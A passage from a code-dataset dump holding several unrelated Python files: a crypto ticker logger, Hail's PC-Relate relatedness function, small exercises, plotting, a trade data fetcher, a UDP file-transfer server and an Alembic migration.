= logging.getLogger()\n logger.setLevel(logging.INFO)\n isTest = None\n try:\n isTest = event[\"isTest\"]\n except KeyError:\n logger.info(\"isTest:{}\".format(isTest))\n\n if isTest:\n logger.addHandler(logging.StreamHandler())\n\n dtKstNow = get_datetime_kst_now()\n dKst = dtKstNow.strftime('%Y-%m-%d')\n logger.info(\"dtKstNow:{} dKst:{}\".format(dtKstNow, dKst))\n\n r = requests.get(API_TICKER)\n ticker = r.json()\n\n if ticker[\"result\"] != \"success\":\n raise Exception(\"invalid response in coinone ticker api. errorcode is \" + ticker['errorCode'])\n\n dynamodb = boto3.resource(\"dynamodb\")\n table = dynamodb.Table(\"coinone_ticker\")\n\n for coin in COINS:\n timestamp = Decimal(ticker[\"timestamp\"])\n price_krw = ticker[coin][\"last\"]\n\n logger.info(\"coin:{} timestamp:{}, price_krw:{}\".format(\n coin.upper(), timestamp, price_krw\n ))\n\n if isTest is not True:\n table.put_item(\n Item={\n \"coin\": coin.upper(),\n \"timestamp\": timestamp,\n \"date_kst\": dKst,\n \"price_krw\": price_krw,\n }\n )\n","sub_path":"probe-coinone/coinone_ticker.py","file_name":"coinone_ticker.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"12927239","text":"import hail as hl\nimport hail.expr.aggregators as agg\nfrom hail.expr import (expr_float64, expr_call, expr_array, analyze,\n matrix_table_source)\nfrom hail.expr.types import tarray\nfrom hail import ir\nfrom hail.linalg import BlockMatrix\nfrom hail.table import Table\nfrom hail.typecheck import typecheck, nullable, numeric, enumeration\n\nfrom ..pca import hwe_normalized_pca\n\n\n@typecheck(call_expr=expr_call,\n min_individual_maf=numeric,\n k=nullable(int),\n scores_expr=nullable(expr_array(expr_float64)),\n min_kinship=nullable(numeric),\n statistics=enumeration('kin', 'kin2', 'kin20', 'all'),\n block_size=nullable(int),\n include_self_kinship=bool)\ndef pc_relate(call_expr, min_individual_maf, *, k=None, scores_expr=None,\n min_kinship=None, statistics=\"all\", block_size=None,\n include_self_kinship=False) -> Table:\n r\"\"\"Compute relatedness estimates between individuals using a variant of the\n PC-Relate method.\n\n .. include:: ../_templates/req_diploid_gt.rst\n\n Examples\n --------\n Estimate kinship, identity-by-descent two, identity-by-descent one, and\n identity-by-descent zero for every pair of samples, using a minimum minor\n allele frequency filter of 0.01 and 10 principal components to control\n for population structure.\n\n >>> rel = hl.pc_relate(dataset.GT, 0.01, k=10)\n\n Only compute the kinship statistic. This is more efficient than\n computing all statistics.\n\n >>> rel = hl.pc_relate(dataset.GT, 0.01, k=10, statistics='kin')\n\n Compute all statistics, excluding sample-pairs with kinship less\n than 0.1. This is more efficient than producing the full table and\n then filtering using :meth:`.Table.filter`.\n\n >>> rel = hl.pc_relate(dataset.GT, 0.01, k=10, min_kinship=0.1)\n\n One can also pass in pre-computed principal component scores.\n To produce the same results as in the previous example:\n\n >>> _, scores_table, _ = hl.hwe_normalized_pca(dataset.GT,\n ... k=10,\n ... compute_loadings=False)\n >>> rel = hl.pc_relate(dataset.GT,\n ... 0.01,\n ... scores_expr=scores_table[dataset.col_key].scores,\n ... min_kinship=0.1)\n\n Notes\n -----\n The traditional estimator for kinship between a pair of individuals\n :math:`i` and :math:`j`, sharing the set :math:`S_{ij}` of\n single-nucleotide variants, from a population with allele frequencies\n :math:`p_s`, is given by:\n\n .. math::\n\n \\widehat{\\phi_{ij}} \\coloneqq\n \\frac{1}{|S_{ij}|}\n \\sum_{s \\in S_{ij}}\n \\frac{(g_{is} - 2 p_s) (g_{js} - 2 p_s)}\n {4 \\sum_{s \\in S_{ij}} p_s (1 - p_s)}\n\n This estimator is true under the model that the sharing of common\n (relative to the population) alleles is not very informative to\n relatedness (because they're common) and the sharing of rare alleles\n suggests a recent common ancestor from which the allele was inherited by\n descent.\n\n When multiple ancestry groups are mixed in a sample, this model breaks\n down. Alleles that are rare in all but one ancestry group are treated as\n very informative to relatedness. However, these alleles are simply\n markers of the ancestry group. The PC-Relate method corrects for this\n situation and the related situation of admixed individuals.\n\n PC-Relate slightly modifies the usual estimator for relatedness:\n occurrences of population allele frequency are replaced with an\n \"individual-specific allele frequency\". This modification allows the\n method to correctly weight an allele according to an individual's unique\n ancestry profile.\n\n The \"individual-specific allele frequency\" at a given genetic locus is\n modeled by PC-Relate as a linear function of a sample's first ``k``\n principal component coordinates. As such, the efficacy of this method\n rests on two assumptions:\n\n - an individual's first `k` principal component coordinates fully\n describe their allele-frequency-relevant ancestry, and\n\n - the relationship between ancestry (as described by principal\n component coordinates) and population allele frequency is linear\n\n The estimators for kinship, and identity-by-descent zero, one, and two\n follow. Let:\n\n - :math:`S_{ij}` be the set of genetic loci at which both individuals\n :math:`i` and :math:`j` have a defined genotype\n\n - :math:`g_{is} \\in {0, 1, 2}` be the number of alternate alleles that\n individual :math:`i` has at genetic locus :math:`s`\n\n - :math:`\\widehat{\\mu_{is}} \\in [0, 1]` be the individual-specific allele\n frequency for individual :math:`i` at genetic locus :math:`s`\n\n - :math:`{\\widehat{\\sigma^2_{is}}} \\coloneqq \\widehat{\\mu_{is}} (1 - \\widehat{\\mu_{is}})`,\n the binomial variance of :math:`\\widehat{\\mu_{is}}`\n\n - :math:`\\widehat{\\sigma_{is}} \\coloneqq \\sqrt{\\widehat{\\sigma^2_{is}}}`,\n the binomial standard deviation of :math:`\\widehat{\\mu_{is}}`\n\n - :math:`\\text{IBS}^{(0)}_{ij} \\coloneqq \\sum_{s \\in S_{ij}} \\mathbb{1}_{||g_{is} - g_{js} = 2||}`,\n the number of genetic loci at which individuals :math:`i` and :math:`j`\n share no alleles\n\n - :math:`\\widehat{f_i} \\coloneqq 2 \\widehat{\\phi_{ii}} - 1`, the inbreeding\n coefficient for individual :math:`i`\n\n - :math:`g^D_{is}` be a dominance encoding of the genotype matrix, and\n :math:`X_{is}` be a normalized dominance-coded genotype matrix\n\n .. math::\n\n g^D_{is} \\coloneqq\n \\begin{cases}\n \\widehat{\\mu_{is}} & g_{is} = 0 \\\\\n 0 & g_{is} = 1 \\\\\n 1 - \\widehat{\\mu_{is}} & g_{is} = 2\n \\end{cases}\n\n \\qquad\n X_{is} \\coloneqq g^D_{is} - \\widehat{\\sigma^2_{is}} (1 - \\widehat{f_i})\n\n The estimator for kinship is given by:\n\n .. math::\n\n \\widehat{\\phi_{ij}} \\coloneqq\n \\frac{\\sum_{s \\in S_{ij}}(g - 2 \\mu)_{is} (g - 2 \\mu)_{js}}\n {4 * \\sum_{s \\in S_{ij}}\n \\widehat{\\sigma_{is}} \\widehat{\\sigma_{js}}}\n\n The estimator for identity-by-descent two is given by:\n\n .. math::\n\n \\widehat{k^{(2)}_{ij}} \\coloneqq\n \\frac{\\sum_{s \\in S_{ij}}X_{is} X_{js}}{\\sum_{s \\in S_{ij}}\n \\widehat{\\sigma^2_{is}} \\widehat{\\sigma^2_{js}}}\n\n The estimator for identity-by-descent zero is given by:\n\n .. math::\n\n \\widehat{k^{(0)}_{ij}} \\coloneqq\n \\begin{cases}\n \\frac{\\text{IBS}^{(0)}_{ij}}\n {\\sum_{s \\in S_{ij}}\n \\widehat{\\mu_{is}}^2(1 - \\widehat{\\mu_{js}})^2\n + (1 - \\widehat{\\mu_{is}})^2\\widehat{\\mu_{js}}^2}\n & \\widehat{\\phi_{ij}} > 2^{-5/2} \\\\\n 1 - 4 \\widehat{\\phi_{ij}} + k^{(2)}_{ij}\n & \\widehat{\\phi_{ij}} \\le 2^{-5/2}\n \\end{cases}\n\n The estimator for identity-by-descent one is given by:\n\n .. math::\n\n \\widehat{k^{(1)}_{ij}} \\coloneqq\n 1 - \\widehat{k^{(2)}_{ij}} - \\widehat{k^{(0)}_{ij}}\n\n Note that, even if present, phase information is ignored by this method.\n\n The PC-Relate method is described in \"Model-free Estimation of Recent\n Genetic Relatedness\". Conomos MP, Reiner AP, Weir BS, Thornton TA. in\n American Journal of Human Genetics. 2016 Jan 7. The reference\n implementation is available in the `GENESIS Bioconductor package\n `_ .\n\n :func:`.pc_relate` differs from the reference implementation in a few\n ways:\n\n - if `k` is supplied, samples scores are computed via PCA on all samples,\n not a specified subset of genetically unrelated samples. The latter\n can be achieved by filtering samples, computing PCA variant loadings,\n and using these loadings to compute and pass in scores for all samples.\n\n - the estimators do not perform small sample correction\n\n - the algorithm does not provide an option to use population-wide\n allele frequency estimates\n\n - the algorithm does not provide an option to not use \"overall\n standardization\" (see R ``pcrelate`` documentation)\n\n Under the PC-Relate model, kinship, :math:`\\phi_{ij}`, ranges from 0 to\n 0.5, and is precisely half of the\n fraction-of-genetic-material-shared. Listed below are the statistics for\n a few pairings:\n\n - Monozygotic twins share all their genetic material so their kinship\n statistic is 0.5 in expection.\n\n - Parent-child and sibling pairs both have kinship 0.25 in expectation\n and are separated by the identity-by-descent-zero, :math:`k^{(2)}_{ij}`,\n statistic which is zero for parent-child pairs and 0.25 for sibling\n pairs.\n\n - Avuncular pairs and grand-parent/-child pairs both have kinship 0.125\n in expectation and both have identity-by-descent-zero 0.5 in expectation\n\n - \"Third degree relatives\" are those pairs sharing\n :math:`2^{-3} = 12.5 %` of their genetic material, the results of\n PCRelate are often too noisy to reliably distinguish these pairs from\n higher-degree-relative-pairs or unrelated pairs.\n\n Note that :math:`g_{is}` is the number of alternate alleles. Hence, for\n multi-allelic variants, a value of 2 may indicate two distinct alternative\n alleles rather than a homozygous variant genotype. To enforce the latter,\n either filter or split multi-allelic variants first.\n\n The resulting table has the first 3, 4, 5, or 6 fields below, depending on\n the `statistics` parameter:\n\n - `i` (``col_key.dtype``) -- First sample. (key field)\n - `j` (``col_key.dtype``) -- Second sample. (key field)\n - `kin` (:py:data:`.tfloat64`) -- Kinship estimate, :math:`\\widehat{\\phi_{ij}}`.\n - `ibd2` (:py:data:`.tfloat64`) -- IBD2 estimate, :math:`\\widehat{k^{(2)}_{ij}}`.\n - `ibd0` (:py:data:`.tfloat64`) -- IBD0 estimate, :math:`\\widehat{k^{(0)}_{ij}}`.\n - `ibd1` (:py:data:`.tfloat64`) -- IBD1 estimate, :math:`\\widehat{k^{(1)}_{ij}}`.\n\n Here ``col_key`` refers to the column key of the source matrix table,\n and ``col_key.dtype`` is a struct containing the column key fields.\n\n There is one row for each pair of distinct samples (columns), where `i`\n corresponds to the column of smaller column index. In particular, if the\n same column key value exists for :math:`n` columns, then the resulting\n table will have :math:`\\binom{n-1}{2}` rows with both key fields equal to\n that column key value. This may result in unexpected behavior in downstream\n processing.\n\n Parameters\n ----------\n call_expr : :class:`.CallExpression`\n Entry-indexed call expression.\n min_individual_maf : :obj:`float`\n The minimum individual-specific minor allele frequency.\n If either individual-specific minor allele frequency for a pair of\n individuals is below this threshold, then the variant will not\n be used to estimate relatedness for the pair.\n k : :obj:`int`, optional\n If set, `k` principal component scores are computed and used.\n Exactly one of `k` and `scores_expr` must be specified.\n scores_expr : :class:`.ArrayNumericExpression`, optional\n Column-indexed expression of principal component scores, with the same\n source as `call_expr`. All array values must have the same positive length,\n corresponding to the number of principal components, and all scores must\n be non-missing. Exactly one of `k` and `scores_expr` must be specified.\n min_kinship : :obj:`float`, optional\n If set, pairs of samples with kinship lower than `min_kinship` are excluded\n from the results.\n statistics : :class:`str`\n Set of statistics to compute.\n If ``'kin'``, only estimate the kinship statistic.\n If ``'kin2'``, estimate the above and IBD2.\n If ``'kin20'``, estimate the above and IBD0.\n If ``'all'``, estimate the above and IBD1.\n block_size : :obj:`int`, optional\n Block size of block matrices used in the algorithm.\n Default given by :meth:`.BlockMatrix.default_block_size`.\n include_self_kinship: :obj:`bool`\n If ``True``, include entries for an individual's estimated kinship with\n themselves. Defaults to ``False``.\n\n Returns\n -------\n :class:`.Table`\n A :class:`.Table` mapping pairs of samples to their pair-wise statistics.\n \"\"\"\n mt = matrix_table_source('pc_relate/call_expr', call_expr)\n\n if k and scores_expr is None:\n _, scores, _ = hwe_normalized_pca(call_expr, k, compute_loadings=False)\n scores_expr = scores[mt.col_key].scores\n elif not k and scores_expr is not None:\n analyze('pc_relate/scores_expr', scores_expr, mt._col_indices)\n elif k and scores_expr is not None:\n raise ValueError(\"pc_relate: exactly one of 'k' and 'scores_expr' must be set, found both\")\n else:\n raise ValueError(\"pc_relate: exactly one of 'k' and 'scores_expr' must be set, found neither\")\n\n scores_table = mt.select_cols(__scores=scores_expr)\\\n .key_cols_by().select_cols('__scores').cols()\n\n n_missing = scores_table.aggregate(agg.count_where(hl.is_missing(scores_table.__scores)))\n if n_missing > 0:\n raise ValueError(f'Found {n_missing} columns with missing scores array.')\n\n mt = mt.select_entries(__gt=call_expr.n_alt_alleles()).unfilter_entries()\n mt = mt.annotate_rows(__mean_gt=agg.mean(mt.__gt))\n mean_imputed_gt = hl.or_else(hl.float64(mt.__gt), mt.__mean_gt)\n\n if not block_size:\n block_size = BlockMatrix.default_block_size()\n\n g = BlockMatrix.from_entry_expr(mean_imputed_gt,\n block_size=block_size)\n\n pcs = scores_table.collect(_localize=False).map(lambda x: x.__scores)\n\n ht = Table(ir.BlockMatrixToTableApply(g._bmir, pcs._ir, {\n 'name': 'PCRelate',\n 'maf': min_individual_maf,\n 'blockSize': block_size,\n 'minKinship': min_kinship,\n 'statistics': {'kin': 0, 'kin2': 1, 'kin20': 2, 'all': 3}[statistics]\n }))\n\n if statistics == 'kin':\n ht = ht.drop('ibd0', 'ibd1', 'ibd2')\n elif statistics == 'kin2':\n ht = ht.drop('ibd0', 'ibd1')\n elif statistics == 'kin20':\n ht = ht.drop('ibd1')\n\n if not include_self_kinship:\n ht = ht.filter(ht.i == ht.j, keep=False)\n\n col_keys = hl.literal(mt.select_cols().key_cols_by().cols().collect(), dtype=tarray(mt.col_key.dtype))\n return ht.key_by(i=col_keys[ht.i], j=col_keys[ht.j])\n","sub_path":"hail/python/hail/methods/relatedness/pc_relate.py","file_name":"pc_relate.py","file_ext":"py","file_size_in_byte":14678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423095302","text":"vetor = list(range(1, 7))\n\n# a\nvetor.extend([1, 0, 5, -2, -5, 7])\n\n# b\nsoma = vetor[0] + vetor[1] + vetor[5]\nprint(f'soma: {soma}')\n\n# c\nvetor[3] = 100\n\n# d\nfor i in vetor:\n print(i)\n","sub_path":"programação em python do básico ao avançado/exercicios/s07_p1_ex01.py","file_name":"s07_p1_ex01.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"168690512","text":"\"\"\"\nsoc.py\n\nAuthor: Tobias Seydewitz\nDate: 25.09.18\nMail: tobi.seyde@gmail.com\n\"\"\"\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nsrc = pd.read_csv('/home/tobi/Documents/Master/code/python/Master/data/proc/ana/soce.csv')\nsrc.drop(['sc4_me', 'sc4_ma', 'sc4_mi', 'sc2_me', 'sc2_ma', 'sc2_mi'], axis=1, inplace=True)\nsrc = src[['Unnamed: 0', 'sc3_ma', 'sc3_me', 'sc3_mi', 'sc1_ma', 'sc1_me', 'sc1_mi']]\nsrc = src.values\n\nfig, axes = plt.subplots(ncols=3, sharey=True, figsize=(4, 2.5))\nfig.subplots_adjust(wspace=0.1)\n\nfor ax, row in zip(axes, [src[1], src[2], src[0]]):\n mean = row[2::3]/1000000000\n lower_err = mean - row[3::3]/1000000000\n upper_err = row[1::3]/1000000000 - mean\n\n ax.bar(\n range(1, 3),\n mean,\n yerr=[lower_err, upper_err],\n width=0.6,\n align='center',\n color='#fc8d59',\n capsize=4\n )\n\n\n ax.set_xticklabels(\n ['SC1', 'SC2'],\n minor=False,\n fontsize=10,\n fontname='Times new roman',\n )\n ax.set_title(row[0].capitalize(), fontsize=12, fontname='Times new roman')\n\naxes[0].set_ylabel(r'SOCe [Gt CO$_2$]', fontsize=12, fontname='Times new roman')\n\nplt.show()\nfig.savefig(\n '/home/tobi/Documents/Master/code/python/Master/doc/thesis/img/soc.png',\n format='png'\n)\nfor row in src:\n print(' & '.join(map(lambda x: x if isinstance(x, str) else str(round(x/1000000000, 2)), row)))","sub_path":"tropicly/scripts/soc.py","file_name":"soc.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542788009","text":"import asyncio\nimport time\nfrom decimal import Decimal\nfrom typing import List\n\nfrom aiohttp import ClientSession\nfrom requests import HTTPError\nimport iso8601\nfrom utils.postgresql import connect, config\nfrom price.data_fetcher import get_historic_price\n\nSQL_CREATE_TABLE = '''CREATE TABLE IF NOT EXISTS public.trades\n(\n id bigint NOT NULL,\n \"time\" timestamp with time zone NOT NULL,\n taker character(43) NOT NULL,\n maker character(43) NOT NULL,\n buy boolean NOT NULL,\n taker_fee numeric NOT NULL,\n maker_fee numeric NOT NULL,\n market character(15) NOT NULL,\n price numeric NOT NULL,\n quantity numeric NOT NULL,\n height integer NOT NULL,\n volume numeric,\n taker_fee_usd numeric,\n maker_fee_usd numeric,\n CONSTRAINT trades_pkey PRIMARY KEY (id)\n)'''\n\nHOST = \"http://164.132.169.19:5001\"\n\nMARKETS = {}\n\nasync def get_markets():\n async with ClientSession() as session:\n url = f\"{HOST}/get_markets\"\n result = await session.request(method='GET', url=url)\n data = await result.json()\n print(data)\n return data\n\n\nasync def update_markets():\n global MARKETS\n data = await get_markets()\n markets = {}\n for market in data:\n ticker = market[\"name\"]\n markets[ticker] = market\n MARKETS = markets\n\n\ndef create_tables(db_config):\n global SQL_CREATE_TABLE\n with connect(db_config) as connection:\n cur = connection.cursor()\n\n cur.execute(SQL_CREATE_TABLE)\n\n connection.commit()\n\n cur.close()\n\n\ndef get_max_trade_id_and_count(db_config):\n with connect(db_config) as connection:\n cur = connection.cursor()\n\n cur.execute(\"SELECT MAX(id), COUNT(1) FROM public.trades;\")\n\n result = cur.fetchone()\n\n cur.close()\n\n if result[0] and result[1]:\n return result[0], result[1]\n return 0, 0\n\n\ndef calculate_volume_and_fees(db_config, trade: dict):\n global MARKETS\n ticker: str = trade[\"market\"]\n if ticker not in MARKETS:\n raise RuntimeError(f\"No market found for {ticker}\")\n\n market = MARKETS[ticker]\n\n timestamp = trade[\"block_created_at\"]\n\n taker_fee_denom = trade[\"taker_fee_denom\"]\n taker_fee_amount = trade[\"taker_fee_amount\"]\n taker_fee_usd = \"0\"\n taker_price = None\n if taker_fee_amount != \"0\":\n utc_time, taker_price = get_historic_price(db_config, taker_fee_denom, timestamp)\n if taker_price:\n taker_fee_usd = f\"{Decimal(taker_fee_amount) * taker_price:.4f}\"\n\n maker_fee_denom = trade[\"maker_fee_denom\"]\n maker_fee_amount = trade[\"maker_fee_amount\"]\n maker_fee_usd = \"0\"\n if maker_fee_amount != \"0\":\n if maker_fee_amount == taker_fee_amount:\n maker_fee_usd = taker_fee_usd\n else:\n if taker_fee_denom == maker_fee_denom and taker_price:\n maker_price = taker_price\n else:\n utc_time, maker_price = get_historic_price(db_config, maker_fee_denom, timestamp)\n\n if maker_price:\n maker_fee_usd = f\"{Decimal(maker_fee_amount) * maker_price:.4f}\"\n\n qty_denom = market[\"base\"]\n volume = \"0\"\n quantity = trade[\"quantity\"]\n utc_time, qty_price = get_historic_price(db_config, qty_denom, timestamp)\n if qty_price:\n volume = f\"{Decimal(quantity) * qty_price:.4f}\"\n\n return volume, taker_fee_usd, maker_fee_usd\n\n\ndef insert_trades(db_config: dict, trades: List[dict], highest_db_id: int):\n sql_trades = []\n for trade in trades:\n height: int = int(trade[\"id\"])\n if height <= highest_db_id:\n continue\n\n volume, taker_fee, maker_fee = calculate_volume_and_fees(db_config, trade)\n\n timestamp = trade[\"block_created_at\"]\n\n sql_trades.append(\n (\n trade[\"id\"],\n f\"timestamp '{timestamp}'\",\n f\"'{trade['taker_address']}'\",\n f\"'{trade['maker_address']}'\",\n \"true\" if trade[\"taker_side\"] == \"buy\" else \"false\",\n trade[\"taker_fee_amount\"],\n trade[\"maker_fee_amount\"],\n f\"'{trade['market']}'\",\n trade[\"price\"],\n trade[\"quantity\"],\n trade[\"block_height\"],\n volume,\n taker_fee,\n maker_fee\n )\n )\n\n if not sql_trades:\n return\n\n with connect(db_config) as connection:\n\n cur = connection.cursor()\n\n insert_str = \",\".join([f\"({','.join(sql_trade)})\" for sql_trade in sql_trades])\n cur.execute(f\"INSERT INTO public.trades(id, time, taker, maker, buy, taker_fee, maker_fee, market, price, quantity, height, volume, taker_fee_usd, maker_fee_usd) VALUES {insert_str}\")\n\n connection.commit()\n\n cur.close()\n\n\nasync def get_trades(after_id, before_id, session):\n \"\"\"Get book details using Google Books API (asynchronously)\"\"\"\n url = f\"{HOST}/get_trades\"\n try:\n response = await session.request(method='GET', url=url, params={\"before_id\": before_id, \"after_id\": after_id})\n response.raise_for_status()\n print(f\"Response status ({url} {after_id}-{before_id}): {response.status}\")\n except HTTPError as http_err:\n print(f\"HTTP error occurred: {http_err}\")\n except Exception as err:\n print(f\"An error ocurred: {err}\")\n response_json = await response.json()\n return response_json\n\n\nasync def fast_data_fetch(start_id, result, session):\n \"\"\"Wrapper for running program in an asynchronous manner\"\"\"\n try:\n response = await get_trades(start_id, start_id+201, session)\n result += response\n except Exception as err:\n print(f\"Exception occured: {err}\")\n pass\n\n\nasync def main():\n db_config = config(\"trading/database.ini\")\n create_tables(db_config)\n max_parallel_requests = 100\n parallel_requests = 1\n await update_markets()\n while True:\n highest_db_id, count = get_max_trade_id_and_count(db_config)\n print(f\"[{count}]Highest Trade ID in database: {highest_db_id}\")\n result = []\n start_time = time.time()\n print(f\"Start requesting with {parallel_requests} parallel requests\")\n async with ClientSession() as session:\n await asyncio.gather(*[fast_data_fetch(highest_db_id+i*200, result, session) for i in range(parallel_requests)])\n duration = time.time() - start_time\n print(f\"Fetching took took {duration:.3}s\")\n start_time = time.time()\n insert_trades(db_config, result, highest_db_id)\n duration = time.time() - start_time\n print(f\"Inserting took {duration:.3}s\")\n parallel_requests = min(int((len(result) / 200) * 2)+1, max_parallel_requests)\n if len(result) < 200:\n time.sleep(2)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","sub_path":"trading/data_fetcher.py","file_name":"data_fetcher.py","file_ext":"py","file_size_in_byte":6881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286475233","text":"import tesnorflow as tf\nimport numpy as np\nimport localization_op\nimport localization_op_grad\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\narray = np.random.rand(32, 100, 100, 3)\ndata = tf.convert_to_tensor(array, dtype=tf.float32)\nrois = tf.convert_to_tensor([[0, 10, 10, 20, 20], [32, 30, 30, 40, 40]], dtype=tf.float32)\n\nW = weight_variable([3, 3, 3, 1])\nh = conv2d(data, W)\n\n[y, argmax] = localization_op.localize(h, rois)\ny_data = tf.convert_to_tensor\n","sub_path":"fast-rcnn/lib/localization_layer/localization_op_test.py","file_name":"localization_op_test.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234100612","text":"# f1/s/device/honeywellreader.py\n\nfrom f1.s.core.docker import DockerRunner\nfrom f1.s.device.base_device import Device\n\n\nclass Reader(Device):\n def __init__(self, id, type, direction, docker, data_pin, clock_pin, architecture, session):\n super().__init__(type, id, docker, architecture, session)\n\n self.direction = direction\n self.data_pin = data_pin\n self.clock_pin = clock_pin\n self.arg = (id, direction)\n\n def scan(self):\n docker = DockerRunner(self.docker, self.session)\n run = docker.run(self.docker_image,\n self.type,\n None,\n None,\n None,\n str(self.direction),\n self.id,\n self.data_pin,\n self.clock_pin)\n return run\n","sub_path":"f1/s/device/honeywellrfidreader.py","file_name":"honeywellrfidreader.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339420204","text":"import socket\nimport os\nimport logging\nfrom datetime import datetime\nimport threading\nimport time\n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# IP del servidor\nip='0.0.0.0'\n#Puerto para el socket TCP\npuertoTCP=10000\nserver_address = (ip, puertoTCP)\npuerto=65535\n\nsock.bind(server_address)\nprint('starting up on {} port {}'.format(*sock.getsockname()))\nsock.listen(25)\n\n# Separador\nSEPARATOR = \"SEPARATOR\"\n\n#Archivos a enviar\nfile1 = \"Archivos/temp_100MB_file.txt\"\nfile2 = \"Archivos/temp_250MB_file.txt\"\n\n#Nombre archivos a enviar\nfilename1 = \"temp_100MB_file.txt\"\nfilename2 = \"temp_250MB_file.txt\"\n\n#Tamaño de los archivos\nfilesize1 = os.path.getsize(file1)\nfilesize2 = os.path.getsize(file2)\n\n#Array vacio de conecciones\nconexiones = []\n\n#Array vacio de las ips de las conexiones\naddresses = []\n\n#Array vacio con tiempos de entrega del archivo\ntiempos = []\n\n#Array vacio con variable que indica si la transmisión fue exitosa o no\nexitos = []\n\n#Array vacio con el número de paquetes enviados\npaquetes = []\n\n#Array vacio con el número de bytes enviados\nbytes = []\n\n#Nombre log\nLOG_FILENAME = datetime.now().strftime('./LogsServidor/%Y_%m_%d_%H_%M_%S.log')\n\n#Variable para cerrar servidor\nfin = False\n\n#Tamaño del buffer\nBUFFER_SIZE = 1024\n\n#Función envío de archivos\ndef archivo(num_archivo, c, i, client_address):\n nombreArchivo = ''\n tamArchivo = 0\n arch = ''\n udpsock= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n if (num_archivo == 1):\n nombreArchivo = filename1\n tamArchivo = filesize1\n arch = file1\n elif (num_archivo == 2):\n nombreArchivo = filename2\n tamArchivo = filesize2\n arch = file2\n start_time = datetime.now()\n paqs = 0\n bytes_env = 0\n nombreTamano = f\"{nombreArchivo}{SEPARATOR}{tamArchivo}\"\n c.send(nombreTamano.encode('ISO-8859-1'))\n time.sleep(1)\n with open(arch, \"rb\") as f:\n while True:\n bytes_read = f.read(BUFFER_SIZE)\n if not bytes_read:\n end_time = datetime.now()\n tiempo = end_time - start_time\n tiempos.append(tiempo)\n paquetes.append(paqs)\n bytes.append(bytes_env)\n break\n udpsock.sendto(bytes_read, (client_address, puerto-i))\n paqs += 1\n bytes_env += BUFFER_SIZE\n c.send(b'Enviando')\n message = b'Finaliza transmision'\n c.send(message)\n data = connection.recv(BUFFER_SIZE)\n mensaje2 = data.decode('utf-8')\n exito = 0\n if ('Transmision exitosa' in mensaje2):\n exito = 1\n elif ('Transmision fallida' in mensaje2):\n exito = 0\n exitos.append(exito)\n\n#Función para crear el log\ndef log(filenameF, filesize, exitos, tiempos, paquetes, bytes):\n filename = LOG_FILENAME\n logging.basicConfig(filename = filename, encoding='utf-8', level=logging.INFO)\n logging.info('LOG SERVIDOR')\n logging.info('Nombre archivo:' + filenameF)\n logging.info('Tamaño archivo:' + str(filesize))\n i = 1\n for c in conexiones:\n logging.info('Cliente ' + str(i))\n if (exitos[i-1] == 1):\n logging.info('Archivo fue entregado exitosamente')\n else:\n logging.info('Archivo no fue entregado exitosamente')\n logging.info('Tiempo de transferencia archivo cliente ' + str(i) + ': '+ str(tiempos[i-1]) + \" milisegundos\")\n logging.info('Total de paquetes transmitidos cliente ' + str(i) + ': ' + str(paquetes[i-1]))\n logging.info('Total de bytes transmitidos cliente ' + str(i) + ': ' + str(bytes[i-1]))\n i += 1\n return filename\n\nif __name__ == \"__main__\":\n while True:\n threads = []\n print('waiting for a connection')\n num_archivo = int(input('¿Qué archivo desea enviar? (1: 100MB, 2: 250MB)'))\n num_clientes = int(input('¿A cuantos clientes desea enviar el archivo?'))\n nomArchivo = ''\n tamArchivo = 0\n if (num_archivo == 1):\n nomArchivo = filename1\n tamArchivo = filesize1\n elif (num_archivo == 2):\n nomArchivo = filename2\n tamArchivo = filesize2\n\n try:\n while True:\n connection, (client_address, client_ip) = sock.accept()\n data = connection.recv(BUFFER_SIZE)\n print('received {!r}'.format(data))\n mensaje = data.decode('utf-8')\n if mensaje == ('Listo para recibir'):\n conexiones.append(connection)\n addresses.append(client_address)\n if len(conexiones) >= num_clientes:\n i=1\n for c in conexiones:\n x = threading.Thread(target=archivo, args=(num_archivo, c, i, addresses[i-1]))\n x.start()\n time.sleep(1)\n threads.append(x)\n i += 1\n for x in threads:\n x.join()\n fin = True\n break\n finally:\n filename = log(nomArchivo, tamArchivo, exitos, tiempos, paquetes, bytes)\n connection.close()\n if fin:\n break","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319486873","text":"\"\"\"empty message\n\nRevision ID: eb1e026f5376\nRevises: \nCreate Date: 2018-05-14 11:34:21.792959\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eb1e026f5376'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('categories',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_categories_name'), 'categories', ['name'], unique=True)\n op.create_table('roles',\n sa.Column('id', sa.Integer(), 